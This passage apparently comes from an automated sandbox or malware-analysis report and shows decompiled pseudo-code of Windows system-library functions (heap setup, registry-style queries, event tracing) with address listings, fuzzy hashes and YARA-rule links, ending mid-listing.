				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x2a4d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E02966D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0299B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x2a47b9c; // 0x0
					_t74 = L02974620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E02999650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L029777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0299F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E029913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L029777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E02999650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0295c608
0x0295c615
0x0295c625
0x0295c62d
0x0295c635
0x0295c640
0x0295c680
0x0295c687
0x0295c688
0x0295c689
0x0295c694
0x0295c694
0x0295c642
0x0295c64a
0x0295c697
0x029c7a25
0x029c7a2b
0x029c7a2e
0x029c7a30
0x029c7bea
0x029c7bea
0x00000000
0x029c7bea
0x029c7a36
0x029c7a43
0x029c7a48
0x029c7a4c
0x029c7a4e
0x00000000
0x00000000
0x029c7a58
0x029c7a5a
0x029c7a5b
0x029c7a5c
0x029c7a5d
0x029c7a63
0x029c7a64
0x029c7a6a
0x029c7a6c
0x029c7a6e
0x029c79cb
0x029c79cb
0x029c79ce
0x029c79d0
0x029c7a98
0x029c7a9b
0x029c7a9b
0x029c7a9e
0x029c7aa1
0x029c7bbe
0x029c7bbe
0x029c7bc0
0x029c7be0
0x029c7be0
0x029c7a01
0x029c7a01
0x029c7a05
0x029c7a07
0x029c7a15
0x029c7a15
0x029c7a1a
0x00000000
0x029c7a1a
0x029c7bc2
0x029c7bc6
0x029c7bc9
0x029c7bcd
0x029c7bcf
0x029c79e6
0x029c79e6
0x029c79eb
0x029c79eb
0x029c79ef
0x029c79f1
0x00000000
0x00000000
0x029c79f3
0x029c79f5
0x029c79ff
0x029c79ff
0x00000000
0x029c79ff
0x029c79f7
0x029c79fd
0x00000000
0x00000000
0x00000000
0x029c79fd
0x029c7bd5
0x029c7bd8
0x00000000
0x00000000
0x029c7ba9
0x029c7bac
0x029c7bb0
0x029c7bb1
0x029c7bb1
0x029c7bb6
0x00000000
0x029c7bb6
0x029c7aa7
0x029c7aaa
0x00000000
0x00000000
0x029c7ab2
0x029c7ab3
0x029c7ab5
0x029c7aec
0x029c7aef
0x029c7b25
0x029c7b28
0x029c7b62
0x029c7b64
0x029c7b8f
0x029c7b92
0x029c7b96
0x029c7b98
0x00000000
0x00000000
0x029c7b9e
0x029c7b9f
0x029c7ba3
0x00000000
0x029c7ba3
0x029c7b66
0x029c7b68
0x029c7ae2
0x029c7ae2
0x00000000
0x029c7ae2
0x029c7b6e
0x029c7b72
0x029c7b75
0x029c7b81
0x029c7b85
0x029c7b87
0x00000000
0x00000000
0x029c7b31
0x029c7b34
0x029c7b3c
0x029c7b45
0x029c7b46
0x029c7b4f
0x029c7b51
0x029c7b57
0x029c7b59
0x029c7b59
0x00000000
0x029c7b59
0x029c7b77
0x00000000
0x029c7b77
0x029c7b2a
0x00000000
0x029c7b2a
0x029c7af1
0x029c7af3
0x00000000
0x00000000
0x029c7afb
0x029c7afc
0x029c7afe
0x00000000
0x00000000
0x029c7b00
0x029c7b03
0x00000000
0x00000000
0x029c7b05
0x029c7b09
0x029c7b0d
0x029c7b0f
0x00000000
0x00000000
0x029c7b18
0x029c7b1d
0x00000000
0x029c7b1d
0x029c7ab7
0x029c7ab9
0x00000000
0x00000000
0x029c7abf
0x029c7ac1
0x00000000
0x00000000
0x029c7ac3
0x029c7ac6
0x00000000
0x00000000
0x029c7ac8
0x029c7acc
0x029c7ad0
0x029c7ad2
0x00000000
0x00000000
0x029c7adb
0x00000000
0x029c7adb
0x029c79d6
0x029c79d9
0x029c79dc
0x029c7a91
0x029c7a94
0x00000000
0x029c7a94
0x029c79e2
0x00000000
0x029c79e2
0x029c7a74
0x029c7a7a
0x00000000
0x00000000
0x029c7a8a
0x029c7a21
0x029c7a21
0x00000000
0x029c7a21
0x0295c650
0x0295c651
0x0295c656
0x0295c65c
0x0295c65d
0x0295c663
0x0295c664
0x0295c66a
0x0295c66e
0x029c79c5
0x029c79c7
0x00000000
0x029c79c7
0x0295c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd7ceeeca3ff99307979963ed9856abf55f3ff0bd666d45de30551586e85620
Instruction ID: dc57a59d81c4bf375e8ff06728f038e6f2b0ddec9678423bd4ab06d5084b0d91
Opcode Fuzzy Hash: 1bd7ceeeca3ff99307979963ed9856abf55f3ff0bd666d45de30551586e85620
Instruction Fuzzy Hash: 1A816E756442419BDB25CE94C880BAAF7EDEB88394F34486EED469B241D330ED41CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 0298138B, Relevance: .2, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0298138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E02980678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E02999660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E02977D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02A1138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E029816C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E02A1A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E0297B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E0297A830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E02A1A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}

0x0298139f
0x029813a1
0x029813a4
0x029813a6
0x029813ab
0x029813b3
0x029c5522
0x00000000
0x029c5522
0x029813b9
0x029813c1
0x029813c4
0x029813cd
0x029813d0
0x029813d9
0x029813dc
0x029813df
0x029813e4
0x029c552b
0x00000000
0x00000000
0x029c5534
0x029c553f
0x029c5545
0x029c5549
0x029c554a
0x029c554f
0x029c5550
0x029c5559
0x029c551c
0x00000000
0x029c551c
0x029c5562
0x029c5574
0x029c5564
0x029c556d
0x029c556d
0x029c557c
0x029c5597
0x029c5597
0x029c559f
0x029c55a2
0x029c55a5
0x029c55a5
0x029813ec
0x029813f2
0x029813f4
0x029813f8
0x029813fe
0x02981400
0x02981406
0x02981412
0x02981419
0x029c55b0
0x029c55b5
0x029c55b8
0x029c55b8
0x02981425
0x02981429
0x0298142c
0x0298142f
0x02981432
0x02981435
0x0298143a
0x0298143d
0x02981443
0x02981446
0x02981449
0x02981450
0x02981453
0x02981459
0x0298145f
0x02981462
0x02981467
0x029814fa
0x0298146d
0x0298146d
0x0298146d
0x0298146f
0x02981479
0x02981480
0x02981507
0x02981508
0x02981510
0x029c55c1
0x029c55c2
0x029c55cc
0x029c55d1
0x029c55d4
0x029c55d7
0x029c55d7
0x02981482
0x02981482
0x02981482
0x02981484
0x0298149b
0x029814a4
0x029814ae
0x029814b4
0x029814b4
0x029814ba
0x029814c4
0x029814c4
0x029814c9
0x029814cf
0x029814d2
0x029814d7
0x029c55df
0x029c55e0
0x029c55ea
0x029814dd
0x029814dd
0x029814df
0x029814e2
0x029814e4
0x029814e4
0x029814e7
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction ID: 060f9cc3b94a31479597517954ccc37a25b29171e00379f83ee8162dca39393a
Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction Fuzzy Hash: 8C819B75A003459FCB24DF68C540BAABBF9EF48310F24856EE85AD7751D330EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029EB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E029EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x2a47b9c; // 0x0
				_t124 = L02974620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E02999800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E029995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E029995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L029777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E02999910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E029995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x2a47b9c; // 0x0
									_t92 = L02974620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E02999910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0295A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E029EE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E029EE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E029995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x029eb8d9
0x029eb8e4
0x00000000
0x029eb8e6
0x029eb8f3
0x029eb8f5
0x029eb8f5
0x029eb8f8
0x029eb920
0x029eb924
0x029eb936
0x029eb939
0x029eb93d
0x029eb948
0x029eb9a0
0x029eb9a0
0x029eb9a4
0x029eb9bf
0x029eb9c4
0x029eb9c6
0x029eb9cd
0x029eb9d1
0x029ebad4
0x029ebad8
0x029ebada
0x029ebadc
0x029ebadc
0x029ebadf
0x029ebae0
0x029ebae2
0x029ebae4
0x029ebaec
0x029ebaee
0x029ebaf0
0x029ebaf0
0x029ebaec
0x029ebafb
0x029ebafc
0x029ebafe
0x029ebb01
0x029ebb01
0x00000000
0x029ebb06
0x029eb9d7
0x029eb9db
0x029eb9db
0x029eb9de
0x029eb9de
0x029eb9e4
0x029eb9e7
0x029eb9ea
0x029eb9ec
0x029eb9ef
0x029eb9f3
0x029eba1b
0x029eba1b
0x029eba23
0x029eba24
0x029eba27
0x029eba2a
0x029eba2b
0x029eba2e
0x029eba30
0x029eba37
0x029eba3f
0x029eba9c
0x029ebaa2
0x029ebb13
0x029ebb15
0x029ebaae
0x029ebaae
0x029ebab3
0x029ebab5
0x029ebaba
0x029ebac8
0x029ebac8
0x029ebaba
0x029ebacd
0x029ebacf
0x00000000
0x029ebacf
0x029ebb1a
0x00000000
0x029ebb1c
0x029ebaa7
0x029ebb11
0x00000000
0x029ebb11
0x029ebaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x029eba41
0x029eba41
0x029eba41
0x029eba58
0x029eba5d
0x029eba62
0x00000000
0x00000000
0x029eba64
0x029eba67
0x029eba68
0x029eba69
0x029eba6c
0x029eba6f
0x029eba71
0x029eba78
0x029eba80
0x00000000
0x00000000
0x029eba90
0x029eba90
0x029eba97
0x00000000
0x029eba97
0x029eb9f5
0x029eb9f7
0x029eb9f7
0x029eb9fa
0x029eba03
0x029eba07
0x029eba0c
0x029eba10
0x029eba17
0x00000000
0x029eb9f7
0x029eb9a6
0x029eb9a8
0x029eb9af
0x029eb9b3
0x00000000
0x00000000
0x029eb9b9
0x00000000
0x029eb9b9
0x029eb94d
0x029eb98f
0x029eb995
0x029eb999
0x029eb960
0x029eb967
0x029eb968
0x029eb96a
0x00000000
0x029eb96a
0x029eb99b
0x029eb99e
0x00000000
0x00000000
0x00000000
0x029eb99e
0x029eb951
0x029eb954
0x029eb95a
0x029eb95e
0x029eb972
0x029eb979
0x029eb97d
0x029eb97f
0x029eb980
0x029eb982
0x029eb984
0x00000000
0x029eb984
0x00000000
0x029eb926
0x00000000
0x029eb926

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381d2844345d8bbc4725d4294cbce4b9595bc0aeb77c79ecff228ca4a27d3891
Instruction ID: f0a4fa7a15d1a68214d0d4d734778d2a06acd70e86b88e8b1cf24c79647e80ef
Opcode Fuzzy Hash: 381d2844345d8bbc4725d4294cbce4b9595bc0aeb77c79ecff228ca4a27d3891
Instruction Fuzzy Hash: 0071EF32200705EFEF229F19C865F66B7EAFB80728F14492CE656976A0DB71E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 029D6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E029D6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E029D6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E02977D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E02999AE0();
					_t87 = L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E029D795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E029D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E029D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E029D795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L02974620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E029D6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E029D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E029D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E029D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E02977D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E02999AE0();
								L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L02972400( &_v36);
							if(_v24 >= 0) {
								_t87 = L02972400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L02972400( &_v52);
							}
							if(_v28 >= 0) {
								return L02972400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x029d6dd4
0x029d6dde
0x029d6de1
0x029d6de3
0x029d6de6
0x029d6de9
